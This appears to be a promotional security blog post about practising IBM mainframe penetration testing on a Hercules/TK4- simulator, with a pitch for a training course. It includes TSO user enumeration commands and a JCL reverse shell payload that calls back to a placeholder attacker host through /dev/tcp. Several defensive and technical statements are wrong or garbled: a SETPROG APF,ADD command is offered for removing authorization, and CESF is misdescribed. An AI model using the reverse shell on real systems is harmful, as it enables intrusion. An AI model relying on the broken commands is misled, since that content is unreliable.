Listen to this Post

Introduction:
For decades, the global financial backbone and critical infrastructure have run on IBM mainframes, yet these systems have remained largely untouched by the majority of the cybersecurity community—a blind spot that presents a massive, largely untapped career opportunity. The release of the Gibson Mainframe Simulator v30.227, an open-source, Python-based tool, has finally democratized access to mainframe security training, allowing anyone to safely practice exploiting simulated TSO, CICS, and Db2 environments without needing access to a multimillion-dollar mainframe.
Learning Objectives:
- Understand the unique attack surfaces of IBM z/OS systems, including TN3270, JES, and APF-authorized libraries.
- Execute a complete penetration test on a simulated mainframe using Linux-based tools, Nmap scripts, and Python payloads.
- Apply defensive hardening techniques such as RACF policy implementation and APF controls to mitigate legacy system vulnerabilities.
You Should Know:
- Setting Up Your Own “Gibson” Mainframe Simulator on Linux
To legally practice mainframe hacking without a real system, you need a simulated environment that mimics the architecture and behavior of an IBM mainframe. While the full Gibson simulator is available at its download location, a robust alternative is using the open-source Hercules emulator combined with the Turnkey MVS 3.8J (TK4-) distribution, which provides a vintage but functionally rich MVS 3.8J environment—a perfect “Gibson” target for learning mainframe penetration testing.
This step-by-step setup guide is for Ubuntu/Debian Linux and creates a fully functional mainframe simulation on your local machine.
Step 1: Install Hercules Dependencies and Compile the Emulator
Hercules is the core emulator that allows you to run mainframe operating systems on your x86 hardware. First, update your package lists and install the necessary build tools and libraries:
sudo apt update && sudo apt install -y build-essential libssl-dev libbz2-dev libreadline-dev git
Next, clone the Hercules source code from its official GitHub repository, configure the build with debugging and optimization flags, then compile and install it:
git clone https://github.com/hercules-390/hercules.git cd hercules ./configure --enable-debug --enable-optimization=3 make && sudo make install
Step 2: Download and Extract the TK4- Mainframe Distribution
The TK4- (Turnkey 4-) distribution includes a pre-configured MVS 3.8J operating system, system datasets, and JCL procedures, saving you months of manual setup. Use `wget` to download the distribution archive, then unzip it into a dedicated directory:
wget https://www.prince-webdesign.nl/tk4-_v1.00_current.zip unzip tk4-_v1.00_current.zip -d ~/tk4-mainframe cd ~/tk4-mainframe
Step 3: Start the Hercules Mainframe Simulator
Within the TK4- directory, launch Hercules with the pre-supplied configuration file, which defines the mainframe’s CPUs, memory, and device allocations. This command will start the mainframe console, showing IPL (Initial Program Load) messages as the virtual machine boots:
hercules -f hercules.cnf
Step 4: Connect to the Mainframe Using a TN3270 Terminal Emulator
Once Hercules is running and has completed the IPL process, you need a TN3270 terminal emulator to interact with the mainframe’s Time Sharing Option (TSO) interface. Install `x3270` and use it to connect to the local TN3270 service on the default port:
sudo apt install x3270 x3270 localhost:3270
You will be presented with a classic IBM 3270 login screen. Use default credentials (e.g., `HERC01` / `CUL8TR` on TK4-) to log into the TSO environment.
2. Reconnaissance and TN3270 User Enumeration
Mainframes often expose the TN3270 service on TCP port 23 (or TN3270E on port 992) for terminal access. Attackers begin by identifying these services and enumerating valid user accounts. The Nmap Scripting Engine (NSE) includes a dedicated script, tso-enum, which can automatically discover valid TSO user IDs by analyzing the mainframe’s response to logon attempts.
The TSO logon panel reveals whether a user ID is valid. When an invalid ID is entered, the system returns a specific message: IKJ56420I Userid <user ID> not authorized to use TSO. The `tso-enum` NSE script relies on the NSE TN3270 library to emulate a TN3270 screen within Nmap, then tests a list of possible user IDs (which can only contain alphanumeric characters and @, “, $, with a maximum length of 7 characters) against the target.
To perform a basic user enumeration scan against a target mainframe’s TN3270 service, run the following Nmap command. This will test a default list of common TSO user IDs and report back which ones are valid:
nmap --script=tso-enum -p 23 <target_IP>
For more targeted enumeration, you can provide your own username dictionary file and override the default TSO access command using script arguments:
nmap -p 23 <target_IP> --script tso-enum --script-args userdb=./custom_users.txt,tso-enum.commands="logon applid(tso)"
Example Output:
PORT STATE SERVICE 23/tcp open tn3270 | tso-enum: | TSO User ID: | TSO User:IBMUSER - Valid User ID | TSO User:SYS1 - Valid User ID |_ TSO User:OPER - Valid User ID
This output provides a valid user list, which is the crucial first step for mounting a credential-based attack or password-guessing campaign.
3. Privilege Escalation via APF-Authorized Libraries
One of the most critical privilege escalation paths on z/OS mainframes involves the Authorized Program Facility (APF). APF authorizes specific datasets (libraries) to run programs with special system privileges. If an attacker can identify a writable APF-authorized library and then write to it, they can install a malicious program or JCL payload that will execute with elevated authority.
The core concept is straightforward: APF defines which programs are trusted. If a library is both APF-authorized and writable, it is a direct path to system-level compromise. Attackers can use JCL (Job Control Language) to submit a payload job to JES (Job Entry Subsystem). A common JCL privilege escalation payload first identifies a writable APF-authorized library (often by scanning the PROGxx or LNKLSTxx parmlib members), then writes a custom payload into that library, and finally uses the `ALTUSER` command or a similar mechanism to grant themselves special privileges like SPECIAL or OPERATIONS.
A sample reverse shell JCL payload can be submitted via FTP, providing an attacker with command-line access to the mainframe’s Unix System Services (OMVS) environment. The core of a Metasploit-style JCL payload might look similar to this:
//REVSHELL JOB (@),'REVERSE SHELL',CLASS=A,MSGCLASS=A //STEP1 EXEC PGM=BPXBATCH //STDOUT DD PATH='/tmp/output',PATHOPTS=(OWRONLY,OCREAT),PATHMODE=SIRWXU //STDERR DD PATH='/tmp/error',PATHOPTS=(OWRONLY,OCREAT),PATHMODE=SIRWXU //STDPARM DD SH echo "nohup /bin/sh -i >& /dev/tcp/<attacker_IP>/<attacker_PORT> 0>&1 &" /
This JCL uses the `BPXBATCH` program to execute a Unix shell command, which in turn establishes a reverse shell back to the attacker’s machine. Once JCL is submitted using the `SUBMIT` command in TSO or via FTP using quote SITE FILE=JES put exploit.jcl, it will execute with the privileges of the submitting user if the JES permissions are misconfigured.
To defend against this, security teams must regularly audit APF-authorized libraries using `LISTAPF` or through RACF reporting. Run the following command within TSO to display the current APF list and check for any writable libraries:
LISTAPF
If a writable APF library is found, immediately change its permissions to read-only and remove the APF authorization from the dataset using the `SETPROG` command:
SETPROG APF,ADD,DSNAME=<data.set.name>,VOLUME=<volume>,SMS
4. CICS Transaction Injection and Abuse
The Customer Information Control System (CICS) is a transaction server that handles real-time processes, such as ATM swipes and credit card authorizations, on mainframes. Misconfigured CICS regions can be exploited by injecting malicious commands through CICS transactions. Attackers often target the default CESN (sign-on) transaction. If CICS security is not properly integrated with RACF, it may be possible to issue commands directly through the transaction input field.
Step-by-step guide for testing CICS command injection:
Step 1: Use the TN3270 terminal to navigate to the CICS region that is potentially vulnerable. Once connected to the mainframe, you can often access CICS by typing `CICS` or by accessing a specific terminal.
Step 2: At the CICS sign-on screen or within an application transaction, attempt to inject a command into a field that is directly passed to the system. For example, if a transaction expects a numeric account number, try inputting =CESF. The `CESF` transaction (CICS Execute System Function) can be used to issue system commands.
Step 3: If the `CESF` transaction is available, you can use it to execute functions that bypass normal security controls. A classic test is to attempt to shut down the CICS region using the `=CESF SHUTDOWN` command, or to query the status of the system using =CESF INQUIRE.
Step 4: A more advanced attack involves exploiting buffer overflows in CICS transactions. Researchers have demonstrated that poorly written COBOL applications can overflow buffers, leading to the execution of arbitrary code within the CICS region’s address space.
To defend against these attacks, CICS regions must be hardened by applying transaction security masks that restrict access based on user ID and terminal ID. Broadcom’s security documentation outlines commands to restrict a user’s ability to use specific TSO commands, a principle that applies equally to CICS transactions. Use the following RACF commands to define a security class for CICS and restrict access to sensitive transactions:
RDEFINE TRANSACTION <transaction_name> UACC(NONE) PERMIT <transaction_name> CLASS(TRANSACTION) ID(<userid>) ACCESS(READ) SETROPTS RACLIST(TRANSACTION) REFRESH
This ensures that only authorized users can execute specific CICS transactions, blocking injection attempts.
- Defensive Hardening and the Path to the MOST Course
Securing a mainframe requires a proactive, layered approach that combines external security manager (ESM) policy enforcement, network segmentation, and continuous monitoring. The RACF (Resource Access Control Facility) is the primary ESM on z/OS systems, and it forms the backbone of mainframe security. Hardening RACF involves defining restrictive default profiles, revoking inactive user IDs, and enforcing strong password rules.
Key hardening commands and techniques:
- Disable an Unused or Suspicious User Account: The `ALTUSER` command can be used to revoke TSO access for an account immediately, which is essential when a breach is suspected or an employee leaves the organization.
ALTUSER <userid> NOACCESS
-
Enable RACF Logging for Failed Logins: To detect brute-force attacks, configure RACF to log any failed login attempts to the SMF (System Management Facilities) audit trail, which can then be monitored by a SIEM (Security Information and Event Management) system.
SETROPTS LOGOPTIONS(FAILURES(LOG))
-
Scan for Vulnerabilities with m-RAY: IBM X-Force Red has released
m-RAY, an open-source, automated vulnerability scanner designed specifically for z/OS mainframes. It checks for the top 25 misconfigurations from the z/OS RACF STIG (Security Technical Implementation Guide), including whether SSH uses secure algorithms and whether permission levels are aligned between the Unix and TSO environments. To run a basic scan usingm-RAY, which is a Python-based framework:git clone https://github.com/xforcered/m-RAY.git cd m-RAY pip install -r requirements.txt python m-ray.py -t <target_mainframe_IP> -u <username> -p <password> --scans ssh,racf
This automated scan reduces hours of manual reconnaissance, allowing defenders to quickly identify and remediate critical misconfigurations.
To gain a comprehensive, structured education in mainframe offensive security, aspiring professionals should consider the Mainframe Offensive Security Tester (MOST) course, delivered by Kev Milne through Neuro Training Ltd. This is widely regarded as the only publicly available course dedicated to mainframe penetration testing. It is designed for two distinct audiences: seasoned mainframers looking to understand security testing, and seasoned penetration testers encountering a mainframe for the first time.
What Kev Milne Say:
- Key Takeaway 1: “Mainframes are a blind spot in modern cybersecurity—mastering them offers a significant career edge.” The critical nature of the data on mainframes, combined with the scarcity of professionals skilled in testing them, creates a high-demand niche with compensation that can be 30% higher than standard penetration testing roles.
- Key Takeaway 2: “The Gibson simulator bridges the gap between legacy systems and modern exploits.” Tools like Gibson and its associated modules (gIDS, gProxy) lower the barrier to entry, allowing students and researchers to experiment with complex attacks in a safe, controlled, Python-powered environment that replicates TSO, CICS, Db2, and JES interfaces.
Analysis: The release of the Gibson Mainframe Simulator represents a paradigm shift in mainframe security education. For years, the mainframe community remained a closed ecosystem due to the high cost and inaccessibility of the hardware. Kev Milne’s work, encompassing the open-source simulator, the MOST course, and the upcoming No Starch Press book, is actively dismantling those barriers. The inclusion of a live web dashboard for real-time monitoring and geolocation within the simulator is particularly innovative, as it mimics the telemetry a real security operations center would see during a mainframe intrusion. The Python-based modular architecture, where a user can add a new command simply by creating a text file, is a powerful enabler for teaching ESM policy concepts like ACF2 and Top Secret without needing access to the actual IBM mainframe security products. As hybrid cloud environments increasingly integrate mainframe backends, this accessible training is timely and crucial for developing the next generation of cybersecurity talent capable of defending the world’s financial heart.
Prediction:
By 2027, mainframes will become a primary target for sophisticated nation-state attackers and ransomware groups, as the disconnect between their criticality and the lack of skilled defenders becomes a glaring vulnerability. Early adopters who complete the MOST course and practice with the Gibson Simulator will find themselves commanding premium salaries as the few experts capable of performing red team exercises and breach response on these high-value platforms, effectively dominating a niche that will explode in demand over the next two years.
▶️ Related Video (82% Match):
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: Brian Harris – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅


